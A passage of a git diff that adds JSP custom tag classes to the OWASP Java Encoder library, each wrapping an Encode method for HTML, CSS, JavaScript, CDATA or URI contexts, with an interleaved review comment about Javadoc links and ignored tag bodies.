+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+package org.owasp.encoder.tag;
+
+import java.io.IOException;
+import javax.servlet.jsp.JspException;
+import org.owasp.encoder.Encode;
+
+/**
+ * A tag to perform encoding sufficient to place into a CDATA block.
+ * This wraps the {@link org.owasp.encoder.Encode#forCDATA(java.lang.String)}.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForCDATATag extends EncodingTag {
+ @Override
+ public void doTag() throws JspException, IOException {
+ Encode.forCDATA(getJspContext().getOut(), _value);
+ }
+}
diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForCssStringTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForCssStringTag.java
new file mode 100644
index 0000000..e6edb5e
--- /dev/null
+++ b/jsp/src/main/java/org/owasp/encoder/tag/ForCssStringTag.java
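Review bot: The `{@link}` in the class Javadoc points at `Encode#forCDATA(java.lang.String)`, but `doTag` calls the two-argument overload that writes straight to `getJspContext().getOut()`; the link should name the overload actually used, `{@link org.owasp.encoder.Encode#forCDATA(java.io.Writer, java.lang.String)}`, and the same mismatch is present in every other `For*Tag` this commit adds (ForCssStringTag through ForXmlAttributeTag). `doTag` also never consults `getJspBody()`, so if the TLD permits body content, a body written as `<e:forCDATA>...</e:forCDATA>` is dropped silently rather than encoded; either declare each tag's `body-content` as `empty` in the TLD, or document on each class that only the `value` attribute is encoded. The TLD is not in this chunk, so I cannot tell which of the two applies.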
@@ -0,0 +1,52 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+package org.owasp.encoder.tag;
+
+import java.io.IOException;
+import javax.servlet.jsp.JspException;
+import org.owasp.encoder.Encode;
+
+/**
+ * A tag to perform CSS encoding for CSS strings.
+ * This wraps the {@link org.owasp.encoder.Encode#forCssString(java.lang.String)}.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForCssStringTag extends EncodingTag {
+ @Override
+ public void doTag() throws JspException, IOException {
+ Encode.forCssString(getJspContext().getOut(), _value);
+ }
+}
diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForCssUrlTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForCssUrlTag.java
new file mode 100644
index 0000000..673a975
--- /dev/null
+++ b/jsp/src/main/java/org/owasp/encoder/tag/ForCssUrlTag.java
@@ -0,0 +1,52 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+package org.owasp.encoder.tag;
+
+import java.io.IOException;
+import javax.servlet.jsp.JspException;
+import org.owasp.encoder.Encode;
+
+/**
+ * A tag to perform CSS encoding for CSS URL contexts.
+ * This wraps the {@link org.owasp.encoder.Encode#forCssUrl(java.lang.String)}.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForCssUrlTag extends EncodingTag {
+ @Override
+ public void doTag() throws JspException, IOException {
+ Encode.forCssUrl(getJspContext().getOut(), _value);
+ }
+}
diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlAttributeTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlAttributeTag.java
new file mode 100644
index 0000000..866b933
--- /dev/null
+++ b/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlAttributeTag.java
@@ -0,0 +1,52 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+package org.owasp.encoder.tag;
+
+import java.io.IOException;
+import javax.servlet.jsp.JspException;
+import org.owasp.encoder.Encode;
+
+/**
+ * A tag to perform HTML encoding for HTML text attributes.
+ * This wraps the {@link org.owasp.encoder.Encode#forHtmlAttribute(java.lang.String)}.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForHtmlAttributeTag extends EncodingTag {
+ @Override
+ public void doTag() throws JspException, IOException {
+ Encode.forHtmlAttribute(getJspContext().getOut(), _value);
+ }
+}
diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlContentTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlContentTag.java
new file mode 100644
index 0000000..9ebf3c7
--- /dev/null
+++ b/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlContentTag.java
@@ -0,0 +1,52 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+package org.owasp.encoder.tag;
+
+import java.io.IOException;
+import javax.servlet.jsp.JspException;
+import org.owasp.encoder.Encode;
+
+/**
+ * A tag to perform HTML encoding for text content.
+ * This wraps the {@link org.owasp.encoder.Encode#forHtmlContent(java.lang.String)}.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForHtmlContentTag extends EncodingTag {
+ @Override
+ public void doTag() throws JspException, IOException {
+ Encode.forHtmlContent(getJspContext().getOut(), _value);
+ }
+}
diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlTag.java
new file mode 100644
index 0000000..71c7d73
--- /dev/null
+++ b/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlTag.java
@@ -0,0 +1,52 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+package org.owasp.encoder.tag;
+
+import java.io.IOException;
+import javax.servlet.jsp.JspException;
+import org.owasp.encoder.Encode;
+
+/**
+ * A tag to perform HTML encoding.
+ * This wraps the {@link org.owasp.encoder.Encode#forHtml(java.lang.String)}.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForHtmlTag extends EncodingTag {
+ @Override
+ public void doTag() throws JspException, IOException {
+ Encode.forHtml(getJspContext().getOut(), _value);
+ }
+}
diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlUnquotedAttributeTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlUnquotedAttributeTag.java
new file mode 100644
index 0000000..5b895f9
--- /dev/null
+++ b/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlUnquotedAttributeTag.java
@@ -0,0 +1,52 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+package org.owasp.encoder.tag;
+
+import java.io.IOException;
+import javax.servlet.jsp.JspException;
+import org.owasp.encoder.Encode;
+
+/**
+ * A tag to perform HTML Attribute encoding for an unquoted attribute.
+ * This wraps the {@link org.owasp.encoder.Encode#forHtmlUnquotedAttribute(java.lang.String)}.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForHtmlUnquotedAttributeTag extends EncodingTag {
+ @Override
+ public void doTag() throws JspException, IOException {
+ Encode.forHtmlUnquotedAttribute(getJspContext().getOut(), _value);
+ }
+}
diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptAttributeTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptAttributeTag.java
new file mode 100644
index 0000000..71ff6b6
--- /dev/null
+++ b/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptAttributeTag.java
@@ -0,0 +1,52 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+package org.owasp.encoder.tag;
+
+import java.io.IOException;
+import javax.servlet.jsp.JspException;
+import org.owasp.encoder.Encode;
+
+/**
+ * A tag to perform JavaScript Attribute encoding.
+ * This wraps the {@link org.owasp.encoder.Encode#forJavaScriptAttribute(java.lang.String)}.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForJavaScriptAttributeTag extends EncodingTag {
+ @Override
+ public void doTag() throws JspException, IOException {
+ Encode.forJavaScriptAttribute(getJspContext().getOut(), _value);
+ }
+}
diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptBlockTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptBlockTag.java
new file mode 100644
index 0000000..439f963
--- /dev/null
+++ b/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptBlockTag.java
@@ -0,0 +1,52 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+package org.owasp.encoder.tag;
+
+import java.io.IOException;
+import javax.servlet.jsp.JspException;
+import org.owasp.encoder.Encode;
+
+/**
+ * A tag to perform JavaScript Block encoding.
+ * This wraps the {@link org.owasp.encoder.Encode#forJavaScriptBlock(java.lang.String)}.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForJavaScriptBlockTag extends EncodingTag {
+ @Override
+ public void doTag() throws JspException, IOException {
+ Encode.forJavaScriptBlock(getJspContext().getOut(), _value);
+ }
+}
diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptSourceTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptSourceTag.java
new file mode 100644
index 0000000..4b6b3b1
--- /dev/null
+++ b/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptSourceTag.java
@@ -0,0 +1,52 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+package org.owasp.encoder.tag;
+
+import java.io.IOException;
+import javax.servlet.jsp.JspException;
+import org.owasp.encoder.Encode;
+
+/**
+ * A tag to perform JavaScript Source encoding.
+ * This wraps the {@link org.owasp.encoder.Encode#forJavaScriptSource(java.lang.String)}.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForJavaScriptSourceTag extends EncodingTag {
+ @Override
+ public void doTag() throws JspException, IOException {
+ Encode.forJavaScriptSource(getJspContext().getOut(), _value);
+ }
+}
diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptTag.java
new file mode 100644
index 0000000..c3edc17
--- /dev/null
+++ b/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptTag.java
@@ -0,0 +1,52 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+package org.owasp.encoder.tag;
+
+import java.io.IOException;
+import javax.servlet.jsp.JspException;
+import org.owasp.encoder.Encode;
+
+/**
+ * A tag to perform JavaScript encoding.
+ * This wraps the {@link org.owasp.encoder.Encode#forJavaScript(java.lang.String)}.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForJavaScriptTag extends EncodingTag {
+ @Override
+ public void doTag() throws JspException, IOException {
+ Encode.forJavaScript(getJspContext().getOut(), _value);
+ }
+}
diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForUriComponentTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForUriComponentTag.java
new file mode 100644
index 0000000..ab1552e
--- /dev/null
+++ b/jsp/src/main/java/org/owasp/encoder/tag/ForUriComponentTag.java
@@ -0,0 +1,53 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+package org.owasp.encoder.tag;
+
+import java.io.IOException;
+import javax.servlet.jsp.JspException;
+import org.owasp.encoder.Encode;
+
+/**
+ * A tag that performs percent-encoding for a component of a URI, such as a query
+ * parameter name or value, path, or query-string.
+ * This wraps the {@link org.owasp.encoder.Encode#forUriComponent(java.lang.String)}.
+ *
